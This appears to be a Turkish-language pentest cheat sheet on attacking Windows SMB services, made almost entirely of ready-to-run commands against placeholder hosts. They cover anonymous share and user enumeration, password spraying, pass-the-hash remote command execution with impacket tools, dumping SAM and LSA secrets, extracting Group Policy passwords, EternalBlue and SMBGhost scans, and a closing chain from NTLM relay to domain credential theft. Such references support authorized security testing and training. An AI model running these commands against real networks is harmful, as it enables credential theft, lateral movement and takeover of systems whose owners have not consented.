Skip to content

SMB Enumeration & Saldırıları

SMB difficulty: orta

SMB (445/tcp, eski 139), Windows ağlarında dosya paylaşımı, named pipe ve uzaktan yönetim için merkezî servistir. Enumeration’dan relay hedefine, PtH ile komut çalıştırmaya kadar iç ağın omurgasıdır.

- Hedef IP / CIDR
- Opsiyonel: domain user:pass veya NTLM hash
- Araçlar: nxc (NetExec), smbclient, smbmap, enum4linux-ng, impacket, nmap
Terminal window
nmap -p445 --script smb-os-discovery,smb-protocols,smb-security-mode 10.10.10.5
Terminal window
nxc smb 10.10.10.0/24
Terminal window
nxc smb 10.10.10.5
Terminal window
smbclient -L //10.10.10.5 -N
Terminal window
smbmap -H 10.10.10.5 -u '' -p ''
Terminal window
smbmap -H 10.10.10.5 -u 'guest' -p ''
Terminal window
nxc smb 10.10.10.5 -u '' -p '' --shares
Terminal window
nxc smb 10.10.10.5 -u 'a' -p '' --shares # guest varyantı
Terminal window
enum4linux-ng -A 10.10.10.5
Terminal window
nbtscan 10.10.10.0/24
Terminal window
nmblookup -A 10.10.10.5

Signing durumu relay için kritik:

Terminal window
nxc smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --shares
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --users
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --groups
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --pass-pol
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --rid-brute
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --sessions
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --loggedon-users
Terminal window
nxc smb 10.10.10.5 -u user -p 'Pass123!' --disks
Terminal window
nxc smb 10.10.10.0/24 -u user -p 'Pass123!' --shares
Terminal window
smbclient //10.10.10.5/Share -U 'hedef.local/user%Pass123!'
Terminal window
smbmap -H 10.10.10.5 -u user -p 'Pass123!' -r
Terminal window
smbmap -H 10.10.10.5 -u user -p 'Pass123!' -R Share --download
Terminal window
nxc smb 10.10.10.5 -u user -p pass --spider SHARE --pattern txt,xlsx,config,kdbx

Hash ile:

Terminal window
nxc smb 10.10.10.5 -u user -H aad3b435b51404eeaad3b435b51404ee:ntlmhash --shares
  1. SMB signing kapalı host bul — nxc smb <range> –gen-relay-list out.txt ; bunlar NTLM relay hedefidir.

  2. Parola sprey — kilitlenme politikasını öğren, sonra tek parola / çok kullanıcı:

    Terminal window
    nxc smb 10.10.10.5 -u user -p pass --pass-pol
    Terminal window
    nxc smb 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!' --continue-on-success
  3. Pass-the-Hash / komut çalıştırma — local admin veya eşdeğeri hash/parola ile:

    Terminal window
    nxc smb 10.10.10.5 -u admin -H <NTLM> -x "whoami /all"
    Terminal window
    nxc smb 10.10.10.5 -u admin -H <NTLM> --sam
    Terminal window
    nxc smb 10.10.10.5 -u admin -H <NTLM> --lsa
    Terminal window
    psexec.py hedef/admin@10.10.10.5 -hashes :NTLM
    Terminal window
    wmiexec.py hedef/admin@10.10.10.5 -hashes :NTLM
    Terminal window
    smbexec.py hedef/admin@10.10.10.5 -hashes :NTLM
    Terminal window
    atexec.py hedef/admin@10.10.10.5 "whoami"
  4. Zafiyet taraması — MS17-010 (EternalBlue), SMBGhost (CVE-2020-0796) vb.:

    Terminal window
    nmap -p445 --script smb-vuln-ms17-010 10.10.10.5
    Terminal window
    nxc smb 10.10.10.0/24 -M ms17-010
    Terminal window
    nxc smb 10.10.10.0/24 -M smbghost
Terminal window
smbclient //dc01/SYSVOL -U 'user%pass'
Terminal window
nxc smb dc01 -u user -p pass -M gpp_password
Terminal window
nxc smb dc01 -u user -p pass -M gpp_autologin

SMB · NetExec

embedded tool
Generated command
nxc smb 10.10.10.0/24 -u user -p Pass123 --shares --users
nxc smb CIDR → signing off + null shares
→ Responder/ntlmrelayx → admin on WORKSTATION
→ --sam / lsassy → local + domain cached
→ PtH → file server → bak.kdbx / scripts